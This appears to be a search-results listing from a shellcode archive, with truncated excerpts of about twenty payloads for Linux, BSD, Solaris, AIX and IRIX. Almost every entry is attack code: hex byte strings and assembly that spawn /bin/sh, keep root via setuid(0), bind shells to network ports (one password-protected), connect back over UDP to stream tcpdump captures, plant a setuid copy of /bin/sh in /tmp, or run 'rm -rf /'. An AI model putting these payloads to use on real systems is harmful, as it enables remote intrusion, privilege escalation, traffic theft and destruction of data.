1131 matches found
Linux/x86 - Connect-Back port UDP/54321 - 151 bytes
No description provided by source. / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / / / / // / // // / //|// //// //,//,/ xenomuta arroba phreaker punto...
Linux/sparc - setreuid(0,0)&standard execve(). 72 bytes
No description provided by source. / Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...
Linux/x86 - execve(/bin/sh) - 16 bytes
No description provided by source. / $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ reusage-linux.c - re-use of "/bin/sh" string in .rodata Copyright c 2003 Marco Ivaldi [email protected] Short local shellcode for /bin/sh execve. It re-uses the "/bin/sh" string stored in the...
Linux/x86-64bits - execve("/bin/sh", ["/bin/sh"], NULL) - 33 bytes
No description provided by source. Linux/X86-64 Dummy for shellcode: execve"/bin/sh", "/bin/sh", NULL hophet at gmail.com .text .globl start start: xorq %rdx, %rdx movq $0x68732f6e69622fff,%rbx shr $0x8, %rbx push %rbx movq %rsp,%rdi xorq %rax,%rax pushq %rax pushq %rdi movq %rsp,%rsi mov $0x3b,%...
Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes
No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...
Linux/mips - execve("/bin/sh",["/bin/sh"],[]); - 60 bytes
No description provided by source. / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char shellcode = "\x50\x73\x06\x24"...
Linux/mips - execve(/bin/sh) - 56 bytes
No description provided by source. / 56 bytes execve /bin/sh shellcode - linux-mipsel - by core [email protected] Note: For MIPS running in little-endian mode. Tested on a Cobalt Qube2 server running Linux 2.4.18 Greetz to bighawk... i couldn't get his execve to work for some reason :/ / char code ...
Linux/x86 - execve("/bin//sh/",["/bin//sh"],NULL)
No description provided by source. / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it [email protected] But this time it's 22 bytes We could start the shellcode with a mov instead of pus...
Linux/x86 - setuid(0) && execve() - 25 bytes
No description provided by source. Hi, i've shrinked down the shellcode to 25 bytes, the smallest setuid & execve GNU/Linux shellcode without nulls that spawns a shell. -------------------------------------------------------------------------------------- SMALLEST SETUID & EXECVE GNU/LINUX x86...
Linux/x86 - execve("rm -rf /")
No description provided by source. / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax cdq push edx push byte 0x2f mov edi, esp push edx push word 0x66...
Linux/mips - port bind 4919 - 276 bytes
No description provided by source. / - MIPS little-endian - linux port listener 276 bytes shellcode - execve"/bin/sh","/bin/sh",; - port 0x1337 4919 - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char...
Aix - execve /bin/sh - 88 bytes
No description provided by source. / Aix execve of /bin/sh Georgi Guninski [email protected] / unsigned int code= 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 ...
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
FreeBSD/x86-64 - Bind TCP Shell /bin/sh + Password R2CBw0cr Shellcode 127 bytes. Shellcode exploit for FreeBSDx86-64 platform / Gitsnik, @dracyrys FreeBSD x8664 bindtcp with passcode, 127 bytes Passcode: R2CBw0cr / C Source: char code = \ "\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99"...
Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)
Linux/x86 - setuid0 + execve"/bin/sh",0,0 Shellcode 28 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte...
Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode
Solaris/SPARC - Bind TCP 2001/TCP Shell /bin/sh Shellcode. Shellcode exploit for SolarisSPARC platform !!! $Id: sparc-bind.s,v 1.1 2003/03/01 01:10:51 ghandi Exp $ !!! Bind /bin/sh to TCP port 2001. Calls setuid0 so /bin/sh won't !!! drop privileges. After assembly, change the third byte in the !...
Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)
Linux/x86 - execve/bin/dash Shellcode 49 bytes. Shellcode exploit for Linuxx86 platform / Shellcode length: 49 Author: Chroniccommand /bin/dash My first attempt at shellcode Poison security / include //49 bytes char shellcode = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"...
Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)
Linux/x86 - fork + setreuid0, 0 + execvecp /bin/sh /tmp/sh; chmod 4755 /tmp/sh Shellcode 126 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755...
Linux/x86 - setuid(0) + execve(/bin/sh, 0, 0) Shellcode (27 bytes)
Linux/x86 - setuid0 + execve/bin/sh, 0, 0 Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include include / by Magnefikko 24.04.2010 [email protected] Promhyl Studies :: http://promhyl.oz.pl Subgroup: PRekambr Name: 27 bytes setuid0 ^ execve"/bin/sh", 0, 0 shellcode Platform: Linux...
BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)
BSD/x86 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for BSDx86 platform / simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode =...
IRIX - execve(/bin/sh -c) Shellcode (72 bytes)
IRIX - execve/bin/sh -c Shellcode 72 bytes. Shellcode exploit for IRIX platform char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 /...